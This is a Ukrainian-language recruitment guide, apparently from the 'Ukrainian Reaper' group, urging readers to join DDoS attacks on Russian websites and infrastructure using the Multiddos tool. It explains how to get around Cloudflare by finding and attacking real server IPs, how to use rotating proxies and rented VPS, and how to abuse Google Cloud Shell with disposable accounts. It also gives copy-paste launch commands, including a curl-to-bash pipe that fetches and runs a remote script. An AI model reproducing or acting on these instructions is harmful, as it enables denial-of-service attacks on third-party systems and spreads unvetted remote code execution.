Чи може звичайна людина приєднатись до санкцій проти РФ? Виявляється може, причому швидко і просто. Наші санкції не потребують узгоджень між кількома країнами, і будуть тривати ще багато років. Тож читайте і приєднуйтесь до кіберфронту України.

Спочатку застереження. Якщо не розуміти принципів DDOS, то можна наробити шкоди. Наприклад, якщо запускати DDOS по російських сайтах, які заблоковані на території України, то DDOS-ити ви будете тільки наші мережі та наших провайдерів зв’язку. Цей трафік не вийде за кордони України, і лише сповільнить місцеві мережі на шляху до адресата. Виправити це легко, але треба знати як. До цього ми повернемось нижче.

Що таке DDOS?

Це коли багато комп’ютерів спілкуються з сервером і він спочатку не встигає відповідати всім, а потім падає і взагалі не відповідає нікому. Оскільки атакуються не тільки вебсайти, а й інша цифрова інфраструктура, то при її виході з ладу перестають працювати усі супутні сервіси. Коли атакується 1С не вдається здати звітність. Коли атакуються аеропорти — важко придбати квитки. Коли атакуються альтернативи google play — неможливо встановити чи користуватись додатками для смартфонів. І навіть у випадках коли атаки не дають 100% результатів, користь від них все одно є. Компанії у країні агресора починають втрачати додаткові гроші через необхідність купувати захист у Cloudflare.

Як цього досягнути? Насправді це відносно просто. Треба мати:

  1. Достатню кількість комп’ютерів;
  2. Знання що саме і як саме треба атакувати;
  3. Добре налаштований софт.

1. Достатня кількість комп’ютерів?

Все залежить з однієї сторони від можливостей комп’ютерів, і з іншої сторони від можливостей сервера, який буде атаковано. Але в загальному випадку, кілька сотень машин вже достатньо для незалежних атак.

Дуже важливо, щоб усі комп’ютери працювали по одних цілях, бо не досягнувши певної критичної маси неможливо суттєво вплинути на роботу серверів.

2. Що і як саме атакувати?

Напряму атакувати сайт немає сенсу. Він або вже знаходиться за WAF, або швидко його увімкне, коли побачить атаку. WAF це Web Application Firewall, найвідомішим з яких є Cloudflare. WAF ховає від сторонніх очей реальний сервер сайту, тому “атакуючи” www.1c.ru напряму ви насправді атакуєте WAF, який дуже добре фільтрує атаки та має великі ресурси для протистояння ним.

Тому атакувати треба не тільки адресу сайту, а і реальні IP адреси серверів, які за допомогою розвідки можна визначити навіть якщо WAF їх приховує. Такі атаки набагато ефективніші.

Сучасні атаки як правило відбуваються на 4 і 7 рівні мережевої моделі OSI. Тому коли кажуть, що будемо атакувати L4 і L7, мають на увазі саме це.

7 рівень це прикладний (application) рівень, як правило HTTPS чи HTTP, інколи FTP.

4 рівень це транспортний (transport) рівень, тобто атаки по протоколу TCP, а інколи та UDP.

Найчастіше атаки йдуть одночасно по HTTPS та TCP, як найбільш результативні.

При атаках не просто бажано, а вкрай необхідно користуватись проксі. Проксі це інші комп’ютери-посередники між вашим комп’ютером і сайтом. Вони ховають ваш реальний IP, чим вбивають одразу двох зайців. Серверу важко вас забанити, бо розумно налаштовані проксі постійно ротуються, тобто змінюються. Без проксі ваш статичний IP швидко потрапляє у чорний список сайту і блокується. Також при роботі через проксі, сервер отримує запити від “посередників”, розкиданих по усьому світу. Зараз це важливо, бо багато російських сайтів вже блокують трафік з України. Нижче ми дамо вам найкращий інструмент, який підтримує проксі і їх автоматичну ротацію.

Перед тим як переходити до софту, торкнемося питання, які пристрої підходять для DDOS. Відповімо на це питання в порядку від найгіршого до найкращого:

  • Не підходять для серйозних атак майже зовсім: смартфони та браузери (зробимо вид, що це пристрій). Атаки з браузерів мало ефективні. Смартфони, мабуть, трохи краще, але і це здебільшого іграшки.
  • Підходять, але є багато нюансів: слабкі ноутбуки, слабкі ПК, атаки через Wi-Fi, атаки через слабке мережеве обладнання, атаки запущені на віртуальних машинах (Virtual Box, Vmware). Як вже згадувалось, DDOS-атаки дають навантаження не тільки на кінцевий пункт призначення, але й на усі попередні ланки, починаючи з самого пристрою де пакети починають генеруватися. Тому на слабкому залізі постійно виникають проблеми. “Воно то працює, то не працює”. Якщо ваш комп’ютер починає підвисати, зникає доступ в інтернет, або вилазять інші проблеми, пов’язані з мережею, це значить що локальне залізо, або софт, не витримують навантажень від DDOS пакетів. В таких випадках перезавантажте комп’ютер, щоб полагодити мережу, спробуйте знизити інтенсивність атаки, чи використайте інше залізо, в іншій мережі.
  • Найбільш доступний тип пристроїв, це звичайні, відносно потужні, домашні комп’ютери, бажано хоча б з 4 ядрами, та з дротовим під’єднанням до Інтернету, хоча останнє необов’язково.
  • Найкращий варіант: VPS. Це віртуальні сервери, які здають в оренду Digital Ocean, Vultr, Linode, Contabo, Azure, і багато інших провайдерів. Якщо підходити з розумом, то оренда одного VPS коштуватиме 5-8 євро на місяць. В таких серверах досить потужні канали (від 100 до 1000 Мбіт/с) і вони розташовані за межами України, тож користуючись ними ви не уповільнюєте локальні мережі. VPS можуть працювати вдень і вночі, що не завжди можливо з домашнім комп’ютером. Існують навіть тарифи з погодинною оплатою, які можна використовувати лише вдень, коли доступ до сайтів найбільш потрібний, то ж його вартість буде ще меншою. Одразу хочемо попередити, щоб ви не зробили помилку новачка. В деяких тарифах є ліміти по трафіку, то ж при його перевищенні буде зніматися додаткова плата. Тому шукайте тарифи без обмежень, або не забувайте видаляти стару VPS і робити нову після використання певної кількості трафіку. Якщо не певні, завжди можна спитати в чаті, посилання на який буде в кінці.

3. Найкращий софт?

Є багато неефективного софту, який використовувався в лютому та березні, хоча де інде використовується й досі. Яким би легким не здавався запуск DDOS через вебсторінку у браузері, або через малоефективні LOIC/HOIC на комп’ютері чи навіть смартфоні, користуватися ними нема великого сенсу, є більш ефективні інструменти.

Multiddos

Український жнець на зв'язку. DDOS-имо РФ за допомогою Multiddos

Нарешті найцікавіше, софт. Multiddos це розробка української групи Український Жнець, що максимально спрощує запуск атак, і поєднує в собі кілька інших українських інструментів.

Чому саме Multiddos? Тому що ось як виглядає типовий шлях початківця, який почув про DDOS атаки та хоче до них приєднатись. В найгіршому випадку він завантажить собі вірус. В трохи кращому, але все ще негативному варіанті буде користуватися ПЗ, яке замість DDOS-у кінцевих цілей буде DDOS-ити українські мережі, та обладнання провайдерів. В нейтральному варіанті він буде користуватись чимось не ефективним і “працювати” наодинці без жодного результату.

Коли і якщо він пройде цей етап, і знайде потужний інструмент, в нього з’являться наступні питання:

  • Як використовувати Linux;
  • Як встановити десятки програм і залежностей для того, щоб DDOS інструмент запрацював;
  • З якими параметрами його запускати;
  • Як робити оновлення;
  • Де брати актуальні цілі;
  • Як бути коли є тільки Windows і встановити Linux немає можливості;
  • Що робити коли в каналі пишуть “атакуємо 5.178.83.44 | 21/TCP | 22/TCP | 25/TCP | 80/TCP | 443/TCP”;
  • Що означає “для UDP потрібен VPN” і де його взяти;
  • І головне, як просто перестати хвилюватись і полюбити DDOS РФ.

Для того, щоб розв’язувати ці питання було розроблено Multiddos, який розв’язує наступні проблеми:

  • Працює на Windows, Mac та Linux;
  • Складну процедуру встановлення і налаштування ПЗ зводить до копіпасту 1-2 команд;
  • Має відкритий код і відкриті списки атак. Все завжди можна подивитись та перевірити;
  • Використовує найефективніше ПЗ і найефективніші методи для атак;
  • Постійно оновлюється;
  • Постійно перевіряє нові цілі від Українського Женця та IT Army та оновлює їх самостійно кожні пів години;
  • Допомагає з атаками IT Army;
  • Підтримує базу на сотні російських вебсайтів, що більше ніж в IT Army, бо ми не відпускаємо цілі багато днів поспіль;
  • Вміє працювати в фоновому режимі;
  • Перевіряє базу на дублікати та видаляє їх, що підвищує продуктивність. Повтори неминучі коли цілі збираються з декількох джерел.

Якщо спробувати втиснути опис Multiddos в одне речення, то отримаємо принцип Парето. 80% результату при витрачанні 20% часу (зусиль). Тільки пропорцію треба змінити на 90% та 10%. З Multiddos ви можете одразу перестрибнути етап набивання шишок і перейти до оптимального результату. А якщо в процесі захочете глибше розібратись як саме воно працює, то ніщо вам в цьому не завадить, і наявність інструкції, комьюніті та відкритого коду тільки допоможе.

Що відбувається всередині Multiddos

Multiddos це, як можна здогадатись по назві, не одна програма, а одразу декілька модулів, які можна як підключати, так і відключати. Коли ви запускаєте Multiddos, то він робить 99% всієї необхідної роботи за вас. Завантажує і встановлює останні версії програм та залежностей. Запускає окремі модулі всередині мултиплексора Tmux. Шукає останні цілі з каналу Українського Женця та запускає DDOS атаку по сотнях знайдених цілей з необхідними параметрами. Після цього кожні пів години перевіряє наявність нових цілей і оновлює їх у разі потреби.

По замовчуванню Multiddos використовує такі модулі:

  • Чисто інформаційний модуль моніторингу gotop, за допомогою якого можна відстежувати навантаження на систему і вихідний трафік;
  • Модуль DDOS, що заснований на українській розробці mhddos_proxy. До речі велика подяка його розробнику, який зробив дуже суттєвий внесок в становлення українського кіберфронту. Саме цей модуль є серцем Multiddos. Він генерує тисячі DDOS пакетів у секунду і відсилає їх одночасно на сотні сайтів та серверів, обраних Українським Женцем для атаки;
  • Останній модуль це модуль пошуку нових проксі. Теж від розробника mhddos_proxy. Запускаючи Multiddos ви не тільки атакуєте російські сервери, але й допомагаєте з пошуком нових проксі з яких незабаром почнуть проводитися нові атаки. Знайдені проксі автоматично відсилаються на сервер розробника mhddos_proxy. Будьте лише готові до того, що це досить довгий процес, і одна робоча проксі знаходиться після сканування приблизно 10 млн адрес.

На цей час саме таку конфігурацію ми вважаємо оптимальною, і додавання інших модулів зараз може лише знизити продуктивність Multiddos. Якщо ситуація зміниться ми переналаштуємо Multiddos на більш потужні інструменти. Якщо ж ви все-таки хочете поекспериментувати з параметрами та модулями, то можете зробити це за допомогою додаткових ключів.

Запуск Multiddos

Для запуску Multiddos ми рекомендуємо використовувати docker. Не лякайтесь, це дуже просто і дає кілька переваг:

  • ПЗ, яке було розроблено для Linux можна без втрати швидкодії запускати на Windows, Mac та Linux, використовуючи для цього одну й ту саму команду;
  • Docker виконує команди в ізольованому середовищі, що безпечніше і тому ми радимо саме цей спосіб;
  • Цей спосіб не потребує ручного вводу root пароля.

Для встановлення docker необхідно або завантажити установник з офіційного сайту docker, або виконати одну з наступних команд:

  • Для Windows 10 або 11: winget install -e --id Docker.DockerDesktop
  • Для Linux (Ubuntu, Debian, Kali, та інших дистрибутивів з apt): sudo apt install docker.io
  • Для MacOS: brew install docker docker-machine

Після цього залишається лише запустити команду для початку DDOS атаки:

  • docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd

Подивимось що вона робить:

docker run -it --rm — стандартний набір параметрів для запуску чогось у docker. ‘-it’ запускає процес в інтерактивному режимі, а ‘--rm’ робить так щоб він повністю зупинявся при закритті. Це технічні моменти роботи docker, які насправді не дуже цікаві.

--log-driver none — відключає лог файли. Використовується як запобіжник, бо інколи docker починає писати нескінченні лог файли та може забити все вільне місце на накопичувачу за кілька годин або днів.

--name multidd — ім’я нашого процесу (контейнеру, якщо говорити мовою docker). Потрібно лише для того, щоб при необхідності контейнер було легко зупинити командою docker stop multidd. Інакше спочатку доведеться дізнаватись через docker ps випадкове ім’я контейнеру, яке призначається в момент запуску.

--pull always — опція яка каже docker завжди перевіряти на сервері нову версію.

karboduck/multidd — це ім’я файлу (мовою docker – образу) який ми запускаємо. По суті karboduck/multidd це налаштований образ Ubuntu в якому автоматично виконується Multiddos.

Якщо ви користуєтесь Linux чи WSL2, або вам просто так зручніше, то є інший варіант запуску Multiddos, без встановлення docker:

  • curl -L tiny.one/multiddos | bash && tmux a

curl -L tiny.one/multiddos – команда curl завантажує файл за посиланням tiny.one/multiddos. Оскільки tiny.one/multiddos це скорочене посилання яке робить редірект на іншу адресу, то використовується ключ -L для того щоб зберігати не HTML сторінку куди веде пряме посилання, а саме файл на який ця сторінка перенаправляє.

| bash — означає що файл (скрипт), який ми зберігли передається в командну оболонку bash і там виконується.

&& tmux a — якщо всі попередні команди успішно виконані, то сессія tmux (програма яка об’єднує інші програми в одному терміналі та дозволяє перемикатись між ними) виводить всі запущені програми в Multiddos з фонового режиму у термінал. Якщо не додавати цю команду, то все буде працювати, але в фоновому режимі, тобто ви не зможете бачити програми у терміналі.

Український жнець на зв'язку. DDOS-имо РФ за допомогою Multiddos

Поради:

  • За можливості не користуйтеся віртуальними машинами (Virtual Box, Wmvare), їх мережева система під час DDOS атак може працювати дуже нестабільно та у вас постійно будуть з’являтися помилки;
  • Якщо щось не працює, скоріш за все “відвалилась” мережа, перезавантажуйте комп’ютер;
  • Не використовуйте робочі комп’ютери. У країні воєнний стан, але використання не власних ресурсів подібним чином може стати джерелом проблем;
  • Якщо не певні, не використовуйте Multiddos з нестандартними налаштуваннями. Його дуже легко розбалансувати та він почне працювати в кілька разів повільніше ніж повинен. Просто запустивши Multiddos в автоматичному режимі ви вже дуже допомагаєте — підтримуєте атаку і шукаєте нові проксі;
  • В домашніх мережах (все що знаходиться за одним роутером) нема потреби запускати атаки з декількох приладів, або в декілька процесів. Один процес Multiddos може повністю використати вихідний канал, і запуск інших копій буде скоріш за все лише заважати та уповільнювати атаку.
  • Якщо ви хочете подивитись як вдало проходять атаки, то стан індивідуальних сайтів можна перевірити на https://check-host.net/check-http. Або ж на сайті IT Army;
  • Якщо у вас немає змоги атакувати з власного комп’ютера, спробуйте використати для цього безплатний Google Cloud Shell. Якщо у вас є Gmail акаунт, то вже є доступ до Google Cloud Shell. Безплатно його можна використовувати лише 50 годин на тиждень, але останнім часом доступ блокують швидше. В такому випадку доведеться почекати коли блокування знімуть, як правило це кілька годин. Також Cloud Shell полюбляє обривати сесію, тому його знадобиться інколи перезапускати. Але навіть запустивши Multiddos на Google Cloud Shell всього кілька раз на день ви вже відправите десятки Гігабайт трафіку по цілях. Нам невідомі факти, щоб Google повністю блокував акаунти Cloud Shell, тим паче Google не блокує поштову скриньку Gmail, яка вважається окремим сервісом, але якщо ви хочете перестрахуватись, то використовуйте Cloud Shell з якимось непотрібним Gmail акаунтом.

В кінці ми закликаємо вас долучитися до українського кіберфронту. Додавайтесь до каналу Український Жнець, заходьте в наш чат. Додавайтесь також до IT ARMY of Ukraine. Обов’язково дайте це посилання своїм друзям і поясніть їм як легко запускається Multiddos, і як важливо постійно тиснути на країну агресора усіма доступними способами. Нам потрібна кожна людина, бо наша сила в кількості. Приєднуючись до Українського Женця ви приєднуєтесь до всього українського кіберфронту, бо ми вже об’єднані з іншими найбільшими групами та допомагаємо одна одній. Якщо нас будуть тисячі, то ми зможемо паралізувати роботу будь-яких сервісів країни агресора. І пізніше ви зможете написати в резюме, що раніше працювали в держсекторі… тобто по держсектору… РФ, але це деталі.